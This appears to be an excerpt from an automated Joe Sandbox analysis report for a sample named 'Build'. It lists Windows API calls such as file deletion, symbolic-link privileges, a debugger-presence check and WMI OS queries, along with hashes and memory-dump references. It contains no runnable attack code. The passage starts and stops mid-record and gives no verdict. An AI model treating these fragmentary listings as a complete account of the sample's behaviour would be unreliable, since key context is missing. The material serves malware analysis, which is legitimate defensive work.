                                                                                            • Part of subcall function 0036BC65: DeleteFileW.KERNELBASE(?,?,?,?,0036B14B,?,00000000,0036AF6E,92C77967,00000000,0039517A,000000FF,?,00368882,?,?), ref: 0036BC82
                                                                                            • Part of subcall function 0036BC65: DeleteFileW.KERNEL32(?,?,?,00000800,?,0036B14B,?,00000000,0036AF6E,92C77967,00000000,0039517A,000000FF,?,00368882,?), ref: 0036BCAE
                                                                                          • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,?,00000001,?), ref: 003681C1
                                                                                          • CloseHandle.KERNEL32(00000000), ref: 003681DD
                                                                                          • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000,?,?,?,?,?,?,?,92C77967,00000000), ref: 00368329
                                                                                            • Part of subcall function 0036B7E2: FlushFileBuffers.KERNEL32(?), ref: 0036B7FC
                                                                                            • Part of subcall function 0036B7E2: SetFileTime.KERNELBASE(?,?,?,?), ref: 0036B8B0
                                                                                            • Part of subcall function 0036AFD0: FindCloseChangeNotification.KERNELBASE(?,?,?,0036AF75,92C77967,00000000,0039517A,000000FF,?,00368882,?,?), ref: 0036AFEB
                                                                                            • Part of subcall function 0036C2E5: SetFileAttributesW.KERNELBASE(?,00000000,?,00000001,?,0036BF5E,?,?), ref: 0036C305
                                                                                            • Part of subcall function 0036C2E5: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0036BF5E,?,?), ref: 0036C334
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true
                                                                                          • Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_360000_Build.jbxd
                                                                                          Similarity
                                                                                          • API ID: File$Close$AttributesCreateDeleteHandle_wcslen$BuffersChangeCurrentErrorFindFlushLastNotificationProcessTime
                                                                                          • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                                                          • API String ID: 243576179-3508440684
                                                                                          • Opcode ID: d6071b76c3ff4f760d95a9486f732426175692698428229b68072b9c6e345dd3
                                                                                          • Instruction ID: 69975b72cb93abd0153fb03cbb448c1f6a3638b772409084e778edc0ce27481c
                                                                                          • Opcode Fuzzy Hash: d6071b76c3ff4f760d95a9486f732426175692698428229b68072b9c6e345dd3
                                                                                          • Instruction Fuzzy Hash: 12D1CBB5900249AFDB22DF60CC81FEEB7ACBF09704F50861AF645EB245DB74A644CB61
                                                                                          APIs
                                                                                          • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00381FD6
                                                                                          • IsDebuggerPresent.KERNEL32 ref: 003820A2
                                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 003820C2
                                                                                          • UnhandledExceptionFilter.KERNEL32(?), ref: 003820CC
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true
                                                                                          • Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_360000_Build.jbxd
                                                                                          Similarity
                                                                                          • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                          • String ID:
                                                                                          • API String ID: 254469556-0
                                                                                          • Opcode ID: 9c7b0c1fb0ec903a73388723be2360e0eccc38c1ecb509afe6e7f70864cfdb4d
                                                                                          • Instruction ID: a8b9a30e6ea3c4db26e434d40f18ea4f65582be6d90b5b7c1fa356bf6e2b31b5
                                                                                          • Opcode Fuzzy Hash: 9c7b0c1fb0ec903a73388723be2360e0eccc38c1ecb509afe6e7f70864cfdb4d
                                                                                          • Instruction Fuzzy Hash: F1311A75D053189BDF21EFA4D98A7CDBBB8AF04300F1041DAE409AB251EB715A84CF04
                                                                                          APIs
                                                                                          • VirtualQuery.KERNEL32(80000000,00380AC5,0000001C,00380CBA,00000000,?,?,?,?,?,?,?,00380AC5,00000004,003C5D24,00380D4A), ref: 00380B91
                                                                                          • GetSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,00380AC5,00000004,003C5D24,00380D4A), ref: 00380BAC
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true
                                                                                          • Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_360000_Build.jbxd
                                                                                          Similarity
                                                                                          • API ID: InfoQuerySystemVirtual
                                                                                          • String ID: D
                                                                                          • API String ID: 401686933-2746444292
                                                                                          • Opcode ID: 9e4767037e36431ac4fe824b9cc37d0a4d97d7ee3a1c279bd3a79c8dc1bee0d6
                                                                                          • Instruction ID: 38213726ac504612195800018cf06cd146b6f0f3a57c45066388983c15743060
                                                                                          • Opcode Fuzzy Hash: 9e4767037e36431ac4fe824b9cc37d0a4d97d7ee3a1c279bd3a79c8dc1bee0d6
                                                                                          • Instruction Fuzzy Hash: 5701F7326002096BCF19EF29DC05FDE7BA9AFC4328F0DC125AD59E7244D634E8058780
                                                                                          APIs
                                                                                          • GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 0037D0E1
                                                                                          • GetNumberFormatW.KERNEL32(00000400,00000000,?,003A272C,?,?), ref: 0037D12A
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true
                                                                                          • Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_360000_Build.jbxd
                                                                                          Similarity
                                                                                          • API ID: FormatInfoLocaleNumber
                                                                                          • String ID:
                                                                                          • API String ID: 2169056816-0
                                                                                          • Opcode ID: ff464214ecd2e1ffddd753d41daf190006da7bc93b4b6b6fe7640c4f664821f5
                                                                                          • Instruction ID: ecd12251e52a9aca0e3c9241c46a6d743a3b49f6fa763ef1b248baab3d5b7435
                                                                                          • Opcode Fuzzy Hash: ff464214ecd2e1ffddd753d41daf190006da7bc93b4b6b6fe7640c4f664821f5
                                                                                          • Instruction Fuzzy Hash: E9116D79211308ABD712DF64DC41FABB7BCFF09700F00842AF905E7291D671AA45CB65
                                                                                          APIs
                                                                                          • GetVersionExW.KERNEL32(?), ref: 0036D0A7
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true
                                                                                          • Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_360000_Build.jbxd
                                                                                          Similarity
                                                                                          • API ID: Version
                                                                                          • String ID:
                                                                                          • API String ID: 1889659487-0
                                                                                          • Opcode ID: ac1ce49555f783f643d89a4e2bc5549148a08fcf83887678d863e8ce6cd0d47b
                                                                                          • Instruction ID: 8814412b0072c3797c7ec12f139f20f7211b28fad4f057271b5274171e448274
                                                                                          • Opcode Fuzzy Hash: ac1ce49555f783f643d89a4e2bc5549148a08fcf83887678d863e8ce6cd0d47b
                                                                                          • Instruction Fuzzy Hash: 45018171E00608CFDB2ACF78EC8169E77B9FB5A304F208219D61A97395EB349909CF40
                                                                                          APIs
                                                                                          • _swprintf.LIBCMT ref: 00370284
                                                                                            • Part of subcall function 00364C00: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00364C13
                                                                                            • Part of subcall function 00373F47: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0036F801,00000000,00000000,?,003A5070,?,0036F801,?,?,00000050,?), ref: 00373F64
                                                                                          • _strlen.LIBCMT ref: 003702A5
                                                                                          • SetDlgItemTextW.USER32(?,003A2274,?), ref: 003702FE
                                                                                          • GetWindowRect.USER32(?,?), ref: 00370334
                                                                                          • GetClientRect.USER32(?,?), ref: 00370340
                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 003703EB
                                                                                          • GetWindowRect.USER32(?,?), ref: 0037041B
                                                                                          • SetWindowTextW.USER32(?,?), ref: 0037044A
                                                                                          • GetSystemMetrics.USER32(00000008), ref: 00370452
                                                                                          • GetWindow.USER32(?,00000005), ref: 0037045D
                                                                                          • GetWindowRect.USER32(00000000,?), ref: 0037048D
                                                                                          • GetWindow.USER32(00000000,00000002), ref: 003704FF
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true
                                                                                          • Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_360000_Build.jbxd
                                                                                          Similarity
                                                                                          • API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
                                                                                          • String ID: $%s:$CAPTION$d$t":
                                                                                          • API String ID: 2407758923-2060924397
                                                                                          • Opcode ID: bafffc1a11b73755f14db9b0793b3b44b90a162f49b2c66f083b664a4fc4c0d5
                                                                                          • Instruction ID: 8f620e34f43e636860b2e2712ef1645ca6129ac7cfcad446de50ee4e25ec9a9c
                                                                                          • Opcode Fuzzy Hash: bafffc1a11b73755f14db9b0793b3b44b90a162f49b2c66f083b664a4fc4c0d5
                                                                                          • Instruction Fuzzy Hash: 8F81BD72108301AFD726DF68CE89E6FBBE8EB89704F04491DF988D7250D734E9088B52
                                                                                          APIs
                                                                                          • ___free_lconv_mon.LIBCMT ref: 0038F1B6
                                                                                            • Part of subcall function 0038ED51: _free.LIBCMT ref: 0038ED6E
                                                                                            • Part of subcall function 0038ED51: _free.LIBCMT ref: 0038ED80
                                                                                            • Part of subcall function 0038ED51: _free.LIBCMT ref: 0038ED92
                                                                                            • Part of subcall function 0038ED51: _free.LIBCMT ref: 0038EDA4
                                                                                            • Part of subcall function 0038ED51: _free.LIBCMT ref: 0038EDB6
                                                                                            • Part of subcall function 0038ED51: _free.LIBCMT ref: 0038EDC8
                                                                                            • Part of subcall function 0038ED51: _free.LIBCMT ref: 0038EDDA
                                                                                            • Part of subcall function 0038ED51: _free.LIBCMT ref: 0038EDEC
                                                                                            • Part of subcall function 0038ED51: _free.LIBCMT ref: 0038EDFE
                                                                                            • Part of subcall function 0038ED51: _free.LIBCMT ref: 0038EE10
                                                                                            • Part of subcall function 0038ED51: _free.LIBCMT ref: 0038EE22
                                                                                            • Part of subcall function 0038ED51: _free.LIBCMT ref: 0038EE34
                                                                                            • Part of subcall function 0038ED51: _free.LIBCMT ref: 0038EE46
                                                                                          • _free.LIBCMT ref: 0038F1AB
                                                                                            • Part of subcall function 0038BAFA: RtlFreeHeap.NTDLL(00000000,00000000,?,0038EEE6,?,00000000,?,00000000,?,0038EF0D,?,00000007,?,?,0038F30A,?), ref: 0038BB10
                                                                                            • Part of subcall function 0038BAFA: GetLastError.KERNEL32(?,?,0038EEE6,?,00000000,?,00000000,?,0038EF0D,?,00000007,?,?,0038F30A,?,?), ref: 0038BB22
                                                                                          • _free.LIBCMT ref: 0038F1CD
                                                                                          • _free.LIBCMT ref: 0038F1E2
                                                                                          • _free.LIBCMT ref: 0038F1ED
                                                                                          • _free.LIBCMT ref: 0038F20F
                                                                                          • _free.LIBCMT ref: 0038F222
                                                                                          • _free.LIBCMT ref: 0038F230
                                                                                          • _free.LIBCMT ref: 0038F23B
                                                                                          • _free.LIBCMT ref: 0038F273
                                                                                          • _free.LIBCMT ref: 0038F27A
                                                                                          • _free.LIBCMT ref: 0038F297
                                                                                          • _free.LIBCMT ref: 0038F2AF
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true
                                                                                          • Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_360000_Build.jbxd
                                                                                          Similarity
                                                                                          • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                          • String ID: h):
                                                                                          • API String ID: 161543041-1003423187
                                                                                          • Opcode ID: 5afb467d8f7b21b70bc8ce114bbf61c0f243fce2e522491cd1cfbe32f7eda5e9
                                                                                          • Instruction ID: 1d7db8f8681ee4d3a7e6b63c52c1fcb86d3b7e6f2845a99abf8e3f8f430181f4
                                                                                          • Opcode Fuzzy Hash: 5afb467d8f7b21b70bc8ce114bbf61c0f243fce2e522491cd1cfbe32f7eda5e9
                                                                                          • Instruction Fuzzy Hash: D6315C35600702DFEB26FA79D845B96B3E9FF00310F2149A9E44ADB251DF75AD90CB10
                                                                                          APIs
                                                                                          • _wcslen.LIBCMT ref: 0037B656
                                                                                          • _wcslen.LIBCMT ref: 0037B6F6
                                                                                          • GlobalAlloc.KERNEL32(00000040,?), ref: 0037B705
                                                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 0037B726
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true
                                                                                          • Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_360000_Build.jbxd
                                                                                          Similarity
                                                                                          • API ID: _wcslen$AllocByteCharGlobalMultiWide
                                                                                          • String ID: FjuK8$</html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
                                                                                          • API String ID: 1116704506-1559201756
                                                                                          • Opcode ID: eb6e8fb92629bfbc0e423d24a8de47fc58641371908d0a915ba75300a0ddd433
                                                                                          • Instruction ID: e4f48f71730c2942f48f3fa43c6bf762dcce1782bf38564583a0615186a024c0
                                                                                          • Opcode Fuzzy Hash: eb6e8fb92629bfbc0e423d24a8de47fc58641371908d0a915ba75300a0ddd433
                                                                                          • Instruction Fuzzy Hash: 3B3124322083417BE72BBB309C06F6FB7AC9F81320F15411EF5059A1C2EB68990483A5
                                                                                          APIs
                                                                                          • GetWindow.USER32(?,00000005), ref: 0037FA20
                                                                                          • GetClassNameW.USER32(00000000,?,00000800), ref: 0037FA4C
                                                                                            • Part of subcall function 00374168: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,000000FF,0036E084,00000000,.exe,?,?,00000800,?,?,?,0037AD5D), ref: 0037417E
                                                                                          • GetWindowLongW.USER32(00000000,000000F0), ref: 0037FA68
                                                                                          • SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 0037FA7F
                                                                                          • GetObjectW.GDI32(00000000,00000018,?), ref: 0037FA93
                                                                                          • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0037FABC
                                                                                          • DeleteObject.GDI32(00000000), ref: 0037FAC3
                                                                                          • GetWindow.USER32(00000000,00000002), ref: 0037FACC
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true
                                                                                          • Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_360000_Build.jbxd
                                                                                          Similarity
                                                                                          • API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
                                                                                          • String ID: STATIC
                                                                                          • API String ID: 3820355801-1882779555
                                                                                          • Opcode ID: e3285a4c7148d8e14317bdfd26d906b392de7778a76b839de56b627a4e005d8a
                                                                                          • Instruction ID: a50e3907e4158f1759ff2735157b03b843bf0ec4c359d11cbe5a2790d27479d8
                                                                                          • Opcode Fuzzy Hash: e3285a4c7148d8e14317bdfd26d906b392de7778a76b839de56b627a4e005d8a
                                                                                          • Instruction Fuzzy Hash: 012145325447107FE233AB348C4AFAF769CBF49710F058428FD49EA191DB78A9028FA1
                                                                                          APIs
                                                                                          • _free.LIBCMT ref: 0038B8C5
                                                                                            • Part of subcall function 0038BAFA: RtlFreeHeap.NTDLL(00000000,00000000,?,0038EEE6,?,00000000,?,00000000,?,0038EF0D,?,00000007,?,?,0038F30A,?), ref: 0038BB10
                                                                                            • Part of subcall function 0038BAFA: GetLastError.KERNEL32(?,?,0038EEE6,?,00000000,?,00000000,?,0038EF0D,?,00000007,?,?,0038F30A,?,?), ref: 0038BB22
                                                                                          • _free.LIBCMT ref: 0038B8D1
                                                                                          • _free.LIBCMT ref: 0038B8DC
                                                                                          • _free.LIBCMT ref: 0038B8E7
                                                                                          • _free.LIBCMT ref: 0038B8F2
                                                                                          • _free.LIBCMT ref: 0038B8FD
                                                                                          • _free.LIBCMT ref: 0038B908
                                                                                          • _free.LIBCMT ref: 0038B913
                                                                                          • _free.LIBCMT ref: 0038B91E
                                                                                          • _free.LIBCMT ref: 0038B92C
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true
                                                                                          • Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_360000_Build.jbxd
                                                                                          Similarity
                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                          • String ID:
                                                                                          • API String ID: 776569668-0
                                                                                          • Opcode ID: 777e898f0cf4576dad278ce2d725703644bbcd5bc1281d3ac44c2b257ff2e628
                                                                                          • Instruction ID: a41cab630f1302d4f00a88a0d50e615772c621839e64c3338dd4374d0d6ed38a
                                                                                          • Opcode Fuzzy Hash: 777e898f0cf4576dad278ce2d725703644bbcd5bc1281d3ac44c2b257ff2e628
                                                                                          • Instruction Fuzzy Hash: 9A11A77A100249AFCB06FF59C992CD97BB5EF04350B0180A5FA094F232DB75EA51DB80
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true
                                                                                          • Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_360000_Build.jbxd
                                                                                          Similarity
                                                                                          • API ID: CallFramesMatchNestedTypeUnexpectedUnwind_aborttype_info::operator==
                                                                                          • String ID: csm$csm$csm
                                                                                          • API String ID: 322700389-393685449
                                                                                          • Opcode ID: ecdb5ed13377dcfbe4ced2e188ead3dc13cde1a43f4dee26c19c80ddbb3ff0f5
                                                                                          • Instruction ID: 38662a73c8d888cbc1ee0cbf171ac265af3e53e02e953210bf0f4925bf1ed91b
                                                                                          • Opcode Fuzzy Hash: ecdb5ed13377dcfbe4ced2e188ead3dc13cde1a43f4dee26c19c80ddbb3ff0f5
                                                                                          • Instruction Fuzzy Hash: 19B17A71800B09EFCF26EFA4D8819AEBBB5FF14310B158599F8116B212D731DA51CF91
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true
                                                                                          • Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_360000_Build.jbxd
                                                                                          Similarity
                                                                                          • API ID: ClearH_prolog3Variant
                                                                                          • String ID: Name$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL$Windows 10$f8
                                                                                          • API String ID: 3629354427-2844002443
                                                                                          • Opcode ID: ea117ed9ae1073b99f50b7cac4a470a5231122441ab808c467e319637f718809
                                                                                          • Instruction ID: 23147e11996aef87f2d207be8d3dc79b91e0a1deb8ed229998f7b9e23bbab3c2
                                                                                          • Opcode Fuzzy Hash: ea117ed9ae1073b99f50b7cac4a470a5231122441ab808c467e319637f718809
                                                                                          • Instruction Fuzzy Hash: 7B715770A10219AFDF16DFA4CC95DBEB7B9BF48710B144569F546EB2A0CB31AD02CB60
                                                                                          APIs
                                                                                          • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,00392452,00000000,00000000,00000000,00000000,00000000,?), ref: 00391D1F
                                                                                          • __fassign.LIBCMT ref: 00391D9A
                                                                                          • __fassign.LIBCMT ref: 00391DB5
                                                                                          • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 00391DDB
